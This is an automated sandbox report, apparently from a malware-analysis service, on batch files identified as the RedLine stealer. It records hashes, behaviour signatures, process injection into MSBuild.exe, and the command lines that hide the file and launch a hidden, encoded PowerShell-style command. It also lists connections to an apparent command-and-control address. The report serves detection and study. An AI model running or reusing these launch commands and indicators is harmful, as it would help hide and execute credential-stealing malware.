| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat"
C:\Windows\system32\attrib.exe
attrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe
C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe
"C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe -wIn 1 -enC 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
C:\Windows\system32\attrib.exe
attrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe
| MD5 | 92f44e405db16ac55d97e3bfe3b132fa |
| SHA1 | 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d |
| SHA256 | 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7 |
| SHA512 | f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f |
memory/2764-4-0x0000000074171000-0x0000000074172000-memory.dmp
memory/2764-5-0x0000000074170000-0x000000007471B000-memory.dmp
memory/2764-7-0x0000000074170000-0x000000007471B000-memory.dmp
memory/2764-8-0x0000000074170000-0x000000007471B000-memory.dmp
memory/2764-6-0x0000000074170000-0x000000007471B000-memory.dmp
memory/2764-9-0x0000000074170000-0x000000007471B000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 19:11
Reported
2024-11-09 19:14
Platform
win10v2004-20241007-en
Max time kernel
137s
Max time network
147s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3472 set thread context of 1312 | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat"
C:\Windows\system32\attrib.exe
attrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe
C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe
"C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe -wIn 1 -enC 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
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\system32\attrib.exe
attrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| RU | 89.23.97.206:48135 | N/A | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| RU | 89.23.97.206:48135 | N/A | tcp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| RU | 89.23.97.206:48135 | N/A | tcp |
| RU | 89.23.97.206:48135 | N/A | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| RU | 89.23.97.206:48135 | N/A | tcp |
| RU | 89.23.97.206:48135 | N/A | tcp |
| RU | 89.23.97.206:48135 | N/A | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe
| MD5 | c32ca4acfcc635ec1ea6ed8a34df5fac |
| SHA1 | f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919 |
| SHA256 | 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70 |
| SHA512 | 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc |
memory/3472-4-0x00000000744CE000-0x00000000744CF000-memory.dmp
memory/3472-5-0x0000000002D00000-0x0000000002D36000-memory.dmp
memory/3472-6-0x00000000744C0000-0x0000000074C70000-memory.dmp
memory/3472-8-0x00000000744C0000-0x0000000074C70000-memory.dmp
memory/3472-7-0x00000000053D0000-0x00000000059F8000-memory.dmp
memory/3472-9-0x0000000005300000-0x0000000005322000-memory.dmp
memory/3472-10-0x0000000005A00000-0x0000000005A66000-memory.dmp
memory/3472-11-0x0000000005A70000-0x0000000005AD6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_emmkcsqh.hdo.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3472-17-0x0000000005BA0000-0x0000000005EF4000-memory.dmp
memory/3472-22-0x00000000061E0000-0x00000000061FE000-memory.dmp
memory/3472-23-0x0000000006270000-0x00000000062BC000-memory.dmp
memory/3472-25-0x00000000072D0000-0x00000000072EA000-memory.dmp
memory/3472-24-0x0000000007B20000-0x000000000819A000-memory.dmp
memory/3472-26-0x00000000074A0000-0x00000000075E4000-memory.dmp
memory/3472-27-0x0000000007370000-0x0000000007464000-memory.dmp
memory/3472-28-0x00000000076E0000-0x00000000076F4000-memory.dmp
memory/3472-29-0x0000000007700000-0x0000000007792000-memory.dmp
memory/1312-30-0x0000000000400000-0x0000000000428000-memory.dmp
memory/1312-33-0x00000000744C0000-0x0000000074C70000-memory.dmp
memory/1312-34-0x0000000007AC0000-0x00000000080D8000-memory.dmp
memory/1312-35-0x0000000007520000-0x0000000007532000-memory.dmp
memory/1312-36-0x0000000007690000-0x000000000779A000-memory.dmp
memory/1312-37-0x00000000075C0000-0x00000000075FC000-memory.dmp
memory/1312-38-0x00000000744C0000-0x0000000074C70000-memory.dmp
memory/3472-39-0x00000000744C0000-0x0000000074C70000-memory.dmp
memory/1312-40-0x00000000744C0000-0x0000000074C70000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-09 19:11
Reported
2024-11-09 19:14
Platform
win7-20241010-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat"
C:\Windows\system32\attrib.exe
attrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe
C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe
"C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe -wIn 1 -enC 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
C:\Windows\system32\attrib.exe
attrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
memory/2836-5-0x000007FEF589E000-0x000007FEF589F000-memory.dmp
memory/2836-6-0x000000001B400000-0x000000001B6E2000-memory.dmp
memory/2836-7-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
memory/2836-8-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
memory/2836-9-0x0000000001CB0000-0x0000000001CB8000-memory.dmp
memory/2836-10-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
memory/2836-11-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp